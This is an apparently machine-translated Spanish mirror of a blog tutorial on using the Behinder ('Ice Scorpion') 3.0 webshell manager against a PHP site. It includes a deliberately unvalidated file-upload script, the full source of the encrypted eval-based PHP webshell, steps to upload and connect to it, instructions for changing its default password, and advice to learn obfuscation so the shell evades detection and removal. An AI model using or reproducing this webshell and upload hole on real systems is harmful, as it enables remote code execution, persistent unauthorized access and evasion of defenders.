Cómo usar ice scorpion 3.0 y cómo cambiar la contraseña predeterminada

Others 2020-09-25 19:33:35 views: null

Prefacio

Acabo de descargar la última versión de Bing Scorpion 3.0 beta2 hoy, pero todavía no puedo conectarme. Más tarde le pedí al hermano mayor de la compañía que averiguara el motivo. Aquí hay un registro, espero que te ayude.

Este artículo es relativamente básico, principalmente para principiantes, con bajo contenido técnico y principalmente para procedimientos operativos.

Primero observe qué archivos se descargan: El
Inserte la descripción de la imagen aquí
archivo del servidor contiene webshells en varios idiomas, como se muestra a continuación:
Inserte la descripción de la imagen aquí

Configuración del entorno

Aquí utilizo php webshell para hacer el experimento. Primero abrí una máquina virtual de Windows, descargué phpstudy, inicié apache y luego escribí un código php para cargar archivos. Aquí está el código de carga de archivos php que viene con el tutorial para principiantes. El código específico es el siguiente:


<!-- index.html代码 -->

<html>
<head>
<meta charset="utf-8">
<title>Upload</title>
</head>
<body>
<!-- 下面表单表示将接收到底文件传给upload_file.php去处理 -->
<form action="upload_file.php" method="post" enctype="multipart/form-data"> 
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>

</body>
</html>

// upload_file.php
<?php 
if ($_FILES["file"]["error"] > 0)
{
    
    
    echo "错误:" . $_FILES["file"]["error"] . "<br>";
}
else
{
    
    
    echo "上传文件名: " . $_FILES["file"]["name"] . "<br>";
    echo "文件类型: " . $_FILES["file"]["type"] . "<br>";
    echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
    echo "文件临时存储的位置: " . $_FILES["file"]["tmp_name"];
}
move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
echo "文件存储在: " . "upload/" . $_FILES["file"]["name"] //文件会被上传到当前目录下的upload文件夹中
?>

Ponga el código de apelación:
Inserte la descripción de la imagen aquí
esta carpeta debe estar allí mientras descargue phpstudy. La instalé usando el directorio predeterminado. El archivo cargado escrito por el código upload_file.php debe colocarse en la carpeta de carga debajo del directorio actual, por lo que Necesitamos crear una carpeta de carga nosotros mismos, como se muestra arriba.

Conectar webshell

Inserte la descripción de la imagen aquí
La página de carga es como se muestra en la figura anterior, haga clic en elegir archivo para seleccionar el archivo y haga clic en enviar para cargar nuestro php webshell.Después de que la carga sea exitosa, aparecerá la siguiente figura.
Inserte la descripción de la imagen aquí

En este momento, haga doble clic para abrir nuestro escorpión de hielo:
Inserte la descripción de la imagen aquí
si no se puede abrir, es posible que la versión de java sea incorrecta, aquí le doy mi propia versión de java como referencia.
Inserte la descripción de la imagen aquí

Después de abrirlo como se muestra en la siguiente figura:
Inserte la descripción de la imagen aquí
Haga clic con el botón derecho en el espacio en blanco y haga clic en Agregar:
Inserte la descripción de la imagen aquí
ingrese la URL y la contraseña y haga clic en GuardarInserte la descripción de la imagen aquí

Permítanme hablar sobre por qué la contraseña predeterminada es rebeyond y cómo cambiar la contraseña predeterminada:
Veamos el código fuente del phpshell de Bingscorp:

<?php
@error_reporting(0);
session_start();

if ($_SERVER['REQUEST_METHOD'] === 'POST')
{
    
    
    $key="e45e329feb5d925b"; //这一行为密码的md5的前16位
	$_SESSION['k']=$key;
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
    
    
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    
    
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
    
    
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{
    
    public function __invoke($p) {
    
    eval($p."");}}
    @call_user_func(new C(),$params);
}
?>

Como marqué en el código

$ key = "e45e329feb5d925b"; // Estos son los primeros 16 bits del md5 de la contraseña.
Vamos al sitio web cmd5 para realizar las operaciones de cifrado y descifrado, e ingresamos rebeyond:
Inserte la descripción de la imagen aquí
encontramos que los primeros 16 del md5 de 32 bits de rebeyond es solo la clave en el código El valor de (es la primera línea md5 (rebeyond, 32)). Ahora todos deberían saber cómo cambiar la contraseña. Simplemente reemplace el valor de la clave en el código con los primeros 16 dígitos del md5 de la contraseña que desea usar, y luego puede usar su propia contraseña para iniciar sesión en el shell. Por ejemplo, si desea usar admin como contraseña, el md5 de admin que encontrará es el siguiente: En
Inserte la descripción de la imagen aquí
este momento, solo necesita cambiar el valor de "$ key =" e45e329feb5d925b ";" en el código a 21232f297a57a5a7 para iniciar sesión usando admin como contraseña. Hablando de esto, ha sido muy detallado, así que basta.

Página del escorpión de hielo

Una vez que la conexión es exitosa, la página es la siguiente:
Inserte la descripción de la imagen aquí
Puede usarla de acuerdo con sus necesidades, pero se recomienda que tenga la oportunidad de estudiar la confusión y la evitación de webshell, de lo contrario, es fácil de verificar y eliminar.

Supongo que te gusta

Origin blog.csdn.net/qq_41874930/article/details/107916317
Recomendado
Clasificación
Diario
Más
2024-04-27(28)
2024-04-26(22)
2024-04-25(34)
2024-04-24(31)
2024-04-23(29)
2024-04-22(5)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)

Code World

© 2018 codetd.com